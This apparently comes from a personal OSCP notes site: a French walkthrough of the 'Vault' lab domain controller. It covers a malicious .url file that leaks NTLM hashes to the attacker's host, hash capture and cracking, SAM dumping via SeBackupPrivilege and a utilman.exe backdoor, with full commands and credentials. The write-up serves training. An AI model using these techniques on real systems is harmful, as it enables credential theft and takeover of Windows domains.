Vault

rid ntlm SeRestorePrivilege

Nom machine : Vault
Difficulté : Difficile
OS : Windows

Enumération

NMAP

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2024-10-02 11:05:07Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
3389/tcp  open  ms-wbt-server syn-ack Microsoft Terminal Services
|_ssl-date: 2024-10-02T11:06:35+00:00; +1s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: VAULT
|   NetBIOS_Domain_Name: VAULT
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: vault.offsec
|   DNS_Computer_Name: DC.vault.offsec
|   DNS_Tree_Name: vault.offsec
|   Product_Version: 10.0.17763
|_  System_Time: 2024-10-02T11:05:55+00:00
| ssl-cert: Subject: commonName=DC.vault.offsec
| Issuer: commonName=DC.vault.offsec
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-01T02:09:28
| Not valid after:  2025-01-31T02:09:28
| MD5:   6cb2:aab3:f717:80bf:6165:7dcc:4fca:92a3
| SHA-1: f155:3524:94c5:522d:0300:245a:53fa:7b13:e8ae:e219
| -----BEGIN CERTIFICATE-----
| MIIC4jCCAcqgAwIBAgIQIXm05T2DbrJJj6OtuSIdhTANBgkqhkiG9w0BAQsFADAa
| MRgwFgYDVQQDEw9EQy52YXVsdC5vZmZzZWMwHhcNMjQwODAxMDIwOTI4WhcNMjUw
| MTMxMDIwOTI4WjAaMRgwFgYDVQQDEw9EQy52YXVsdC5vZmZzZWMwggEiMA0GCSqG
| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDNl3Dno4YF5jgm9jJscrc+ACEhH/8eGx90
| WHSqUzg1nX+JLQ4LdY+3fSc/wgJOND7HawjdJZqpK0xlPxR90WK5OKGUV+Ccf/xo
| PWdqXRObI312SaLp48JOPIwYBVrroBGgFHjji0WBxWk4kR+gHVUvpbiEp2c2FC0x
| erWw7dwUb8OeU+HuYiSyFmAw+eNyNa/ffI4AezvokUu5kqnYyt3HgAgWTsgbl4nr
| txjfmSLdLmkIymjnKPwlOSWIK9ImXfbSj158IMbZ0IPakdkYP75qrjkLR1LZS4a1
| b1i8poGjACEIjM9rnH9nFrQb7HG+6yQIZjmnE3LH/6cKhlRwNb8RAgMBAAGjJDAi
| MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsF
| AAOCAQEAVuIIDodAh0PRCBae72EgBjLwGVPovt5VwXserXpu2+h/+vSX4fz8VwsL
| DCyxXQQ8TCcZV1RIO+kPqYxjsr9/UpBl70w1/81eXQipMX455MankmFoWl6C12lE
| aOCrGKSRNcWXoTmL/Ci8vS/0YQzfbyRnhVlLCH4KTp2q5szpt0oV5PMTwLEfMsNF
| 3FCEF2QxhneFtYLUXC6z0evt/iibPMeJG92j1X2I9Ffzbyzt2HdqNRQaoELr/ieS
| 2JoSJ+latRL7ntuoDHaoMRXEN0fr6QEiK6IJs83KMo0Py2mXSNBotfINoF28w0KE
| 9hIcCfKcmNHixb3wlOA7VY4l9iy25w==
|_-----END CERTIFICATE-----
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
49675/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         syn-ack Microsoft Windows RPC
49681/tcp open  msrpc         syn-ack Microsoft Windows RPC
49708/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 0s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 43470/tcp): CLEAN (Timeout)
|   Check 2 (port 16135/tcp): CLEAN (Timeout)
|   Check 3 (port 47107/udp): CLEAN (Timeout)
|   Check 4 (port 8957/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-10-02T11:05:59
|_  start_date: N/A

/etc/hosts : vault.offsec

SMB

Nous avons accès à un partage SMB mais le dossier est vide. Nous allons bruteforce les rid.

┌──(kali㉿kali)-[~]
└─$ crackmapexec smb vault.offsec -u guest -p '' --rid-brut
SMB         vault.offsec    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:vault.offsec) (signing:True) (SMBv1:False)
SMB         vault.offsec    445    DC               [+] vault.offsec\guest: 
SMB         vault.offsec    445    DC               [+] Brute forcing RIDs
SMB         vault.offsec    445    DC               498: VAULT\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         vault.offsec    445    DC               500: VAULT\Administrator (SidTypeUser)
SMB         vault.offsec    445    DC               501: VAULT\Guest (SidTypeUser)
SMB         vault.offsec    445    DC               502: VAULT\krbtgt (SidTypeUser)
SMB         vault.offsec    445    DC               512: VAULT\Domain Admins (SidTypeGroup)
SMB         vault.offsec    445    DC               513: VAULT\Domain Users (SidTypeGroup)
SMB         vault.offsec    445    DC               514: VAULT\Domain Guests (SidTypeGroup)
SMB         vault.offsec    445    DC               515: VAULT\Domain Computers (SidTypeGroup)
SMB         vault.offsec    445    DC               516: VAULT\Domain Controllers (SidTypeGroup)
SMB         vault.offsec    445    DC               517: VAULT\Cert Publishers (SidTypeAlias)
SMB         vault.offsec    445    DC               518: VAULT\Schema Admins (SidTypeGroup)
SMB         vault.offsec    445    DC               519: VAULT\Enterprise Admins (SidTypeGroup)
SMB         vault.offsec    445    DC               520: VAULT\Group Policy Creator Owners (SidTypeGroup)
SMB         vault.offsec    445    DC               521: VAULT\Read-only Domain Controllers (SidTypeGroup)
SMB         vault.offsec    445    DC               522: VAULT\Cloneable Domain Controllers (SidTypeGroup)
SMB         vault.offsec    445    DC               525: VAULT\Protected Users (SidTypeGroup)
SMB         vault.offsec    445    DC               526: VAULT\Key Admins (SidTypeGroup)
SMB         vault.offsec    445    DC               527: VAULT\Enterprise Key Admins (SidTypeGroup)
SMB         vault.offsec    445    DC               553: VAULT\RAS and IAS Servers (SidTypeAlias)
SMB         vault.offsec    445    DC               571: VAULT\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         vault.offsec    445    DC               572: VAULT\Denied RODC Password Replication Group (SidTypeAlias)
SMB         vault.offsec    445    DC               1000: VAULT\DC$ (SidTypeUser)
SMB         vault.offsec    445    DC               1101: VAULT\DnsAdmins (SidTypeAlias)
SMB         vault.offsec    445    DC               1102: VAULT\DnsUpdateProxy (SidTypeGroup)
SMB         vault.offsec    445    DC               1103: VAULT\anirudh (SidTypeUser)

anirudh est un username. Nous avons tenter de bruteforce son mot de passe à l'aide de kerbrute mais sans succès. Nous allons chercher à voler le hash NTLM.

GitHub - Greenwolf/ntlm_theft: A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)GitHub

Accès initial

┌──(kali㉿kali)-[~/ntlm_theft]
└─$ python3 ntlm_theft.py -g url -s 192.168.45.181 -f vault
Created: vault/vault-(url).url (BROWSE TO FOLDER)
Created: vault/vault-(icon).url (BROWSE TO FOLDER)
Generation Complete.                                                                   
┌──(kali㉿kali)-[~/ntlm_theft]
└─$ cd vault                                           
                                               
┌──(kali㉿kali)-[~/ntlm_theft/vault]
└─$ ls
'vault-(icon).url'  'vault-(url).url'                                                                       
┌──(kali㉿kali)-[~/ntlm_theft/vault]
└─$ cat *                                                  
[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\192.168.45.181\%USERNAME%.icon
IconIndex=1[InternetShortcut]
URL=file://192.168.45.181/leak/leak.html 

┌──(kali㉿kali)-[~/ntlm_theft/vault]
└─$ smbclient //192.168.190.172/DocumentsShare             
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> put vault-(icon).url
putting file vault-(icon).url as \vault-(icon).url (1.2 kb/s) (average 1.2 kb/s)

On lance responder pour capturer le hash

┌──(kali㉿kali)-[~/oscp]
└─$ sudo responder -I tun0
{...}
[SMB] NTLMv2-SSP Client   : 192.168.190.172
[SMB] NTLMv2-SSP Username : VAULT\anirudh
[SMB] NTLMv2-SSP Hash     : anirudh::VAULT:6f385e19f1a45653:CFF7B2468A10BCFD658482DB4266E7F5:01010000000000000006466E9F14DB018796A2AA8A30E2940000000002000800330047005700440001001E00570049004E002D003000460033005500460035004A004300580049005A0004003400570049004E002D003000460033005500460035004A004300580049005A002E0033004700570044002E004C004F00430041004C000300140033004700570044002E004C004F00430041004C000500140033004700570044002E004C004F00430041004C00070008000006466E9F14DB0106000400020000000800300030000000000000000100000000200000A26B564BC75A19D5CF9CFDC087083FCDDB4C8E97519F75A674E3DF5FA98AC4860A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E003100380031000000000000000000

Nous allons cracker le hash NTLM avec hashcat

┌──(kali㉿kali)-[~/oscp/vault]
└─$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

{...}
ANIRUDH::VAULT:6f385e19f1a45653:cff7b2468a10bcfd658482db4266e7f5:01010000000000000006466e9f14db018796a2aa8a30e2940000000002000800330047005700440001001e00570049004e002d003000460033005500460035004a004300580049005a0004003400570049004e002d003000460033005500460035004a004300580049005a002e0033004700570044002e004c004f00430041004c000300140033004700570044002e004c004f00430041004c000500140033004700570044002e004c004f00430041004c00070008000006466e9f14db0106000400020000000800300030000000000000000100000000200000a26b564bc75a19d5cf9cfdc087083fcddb4c8e97519f75a674e3df5fa98ac4860a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00340035002e003100380031000000000000000000:SecureHM

Nous aurions plus le cracker comme dit précédemment avec kerbrute mais cela aurait pris beaucoup trop de temps.

┌──(kali㉿kali)-[~/oscp/vault]
└─$ grep -n SecureHM /usr/share/wordlists/rockyou.txt
10608878:SecureHM

┌──(kali㉿kali)-[~/oscp/vault]
└─$ evil-winrm -u anirudh -p SecureHM -i vault.offsec
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\anirudh\Documents> whoami
vault\anirudh

Elévation des privilèges

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled

SeBackupPrivilege

Windows Privilege Escalation: SeBackupPrivilegeHacking Articles

*Evil-WinRM* PS C:\Users\anirudh\desktop> cd c:\
*Evil-WinRM* PS C:\> mkdir Temp


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        10/2/2024   5:03 AM                Temp


*Evil-WinRM* PS C:\> reg save hklm\sam c:\Temp\sam
The operation completed successfully.

*Evil-WinRM* PS C:\> reg save hklm\system c:\Temp\system
The operation completed successfully.

*Evil-WinRM* PS C:\> cd Temp
*Evil-WinRM* PS C:\Temp> dir


    Directory: C:\Temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        10/2/2024   5:03 AM          49152 sam
-a----        10/2/2024   5:03 AM       16498688 system


*Evil-WinRM* PS C:\Temp> download sam
Info: Downloading C:\Temp\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\Temp> download system
Info: Downloading C:\Temp\system to system         
Info: Download successful!

┌──(kali㉿kali)-[~/oscp/vault]
└─$ impacket-secretsdump -sam sam -system system LOCAL 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0xe9a15188a6ad2d20d26fe2bc984b369e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:608339ddc8f434ac21945e026887dc36:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

Nous n'arrivons pas à nous connecter avec le hash, le compte doit être désactivé. Nous allons abuser du SeRestorePrivilege

*Evil-WinRM* PSmv c:\windows\system32\utilman.exe c:\windows\system32\utilman.old
*Evil-WinRM* PS C:\Users\anirudh\Documents> mv c:\windows\system32\cmd.exe c:\windows\system32\utilman.exe

Pour appeler utilman.exe : windows + U via rdp (rdesktop)

PrécédentTwiggy SuivantWombo

Mis à jour il y a 1 an

hashtagEnumération

hashtagNMAP

hashtagSMB

hashtagAccès initial

hashtagElévation des privilèges

Enumération

NMAP

SMB

Accès initial

Elévation des privilèges